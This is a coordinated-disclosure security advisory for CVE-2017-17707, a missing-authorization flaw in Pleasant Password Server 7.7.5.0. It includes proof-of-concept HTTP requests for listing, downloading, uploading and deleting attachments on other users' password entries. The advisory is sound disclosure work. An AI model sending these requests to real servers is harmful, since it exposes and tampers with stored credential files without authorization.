Profundis Labs - Security Advisory Vulnerablity Title ================== Unauthorized read and write access to attachments Vendor: ======= Pleasant Solutions Inc (http://pleasantsolutions.com/) Product: ======== Pleasant Password Server Pleasant Password Server is an award-winning multi-user password management tool compatible with "KeePass Password Safe" and Bruce Schneier's "Password Safe", the most popular password management systems in the world. (Source: http://pleasantsolutions.com/passwordserver/) Affected Versions: ================== Version 7.7.5.0 (lower versions not tested) Vulnerability Type: =================== Incorrect Access Control CVE Reference: ============== CVE-2017-17707 VENDOR Reference: ================= https://info.pleasantsolutions.com/Documentation/Pleasant_Password_Server/Z._Release_Notes/007.008.003 Vendor Reference Number: n.a. Vulnerability Details: ====================== Due to missing authorization checks, any authenticated user is able to list, upload, or delete attachments to password safe entries. To perform those actions on an entry, the user needs to know the corresponding "CredentialId" value, which uniquely identifies a password safe entry. Since "CredentialId" values are implemented as GUIDs, they are hard to guess. However, if for example an entry's owner grants read-only access to a malicious user, the value gets exposed to the malicious user. The same holds true for temporary grants. PoC code(s): ============ Unauthorized listing of all attachments of a password entry: ------------------------------------------------------------ POST /WebClient/CredentialAttachmentGrid/Select?CredentialId= HTTP/1.1 Host: :10001 ... sort=&page=1&pageSize=50&group=&filter= Unauthorized download of an attachment: --------------------------------------- GET /WebClient/Attachment/DownloadAttachment?attachmentId= Host: :10001 Valid value for parameter attachmentId can be obtained by listing all attachments of a password entry. Unauthorized upload: -------------------- POST /WebClient/Attachment/UploadAttachment?CredentialId= HTTP/1.1 Host: :10001 ... Content-Type: multipart/form-data; boundary=---------------------------78354892818879161581062199251 Connection: close -----------------------------78354892818879161581062199251 Content-Disposition: form-data; name="__RequestVerificationToken" -----------------------------78354892818879161581062199251 Content-Disposition: form-data; name="attachments"; filename="example.txt" Content-Type: text/html HELLO WORLD -----------------------------78354892818879161581062199251-- Unauthorized delete: -------------------- POST /WebClient/CredentialAttachmentGrid/Delete?CredentialId= HTTP/1.1 Host: :10001 ... sort=&group=&filter=&__RequestVerificationToken=&data.FileName=&data.DisplayFileName=&data.FileDataId=&data.Id=&FileName=&DisplayFileName=&FileDataId=&Id= Valid values for parameters FileDataId () and Id () can be obtained by listing all attachments of an entry. Remark: Values in angle brackets are placeholders. Disclosure Timeline: ==================== Vendor Notification: 12/19/2017 Vendor Confirmation: 12/20/2017 Vendor Patch Release: 03/01/2018 Public Disclosure: 06/22/2018 Severity Level: =============== 8.8 (High) CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H Description: ============ Request Method(s): [+] HTTP GET/POST Vulnerable Product: [+] Pleasant Password Server 7.7.5.0 Vulnerable Parameter(s): [+] CredentialId (POST /WebClient/CredentialAttachmentGrid/Select) attachmentId (GET /WebClient/Attachment/DownloadAttachment) CredentialId (POST /WebClient/Attachment/UploadAttachment) CredentialId (POST /WebClient/CredentialAttachmentGrid/Delete) Authentication (Role): [+] User =========================================================== [+] Author: Philipp Rocholl [+] Website: https://www.profundis-labs.com [+] Source: https://profundis-labs.com/advisories/CVE-2017-17707.txt [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of security related information.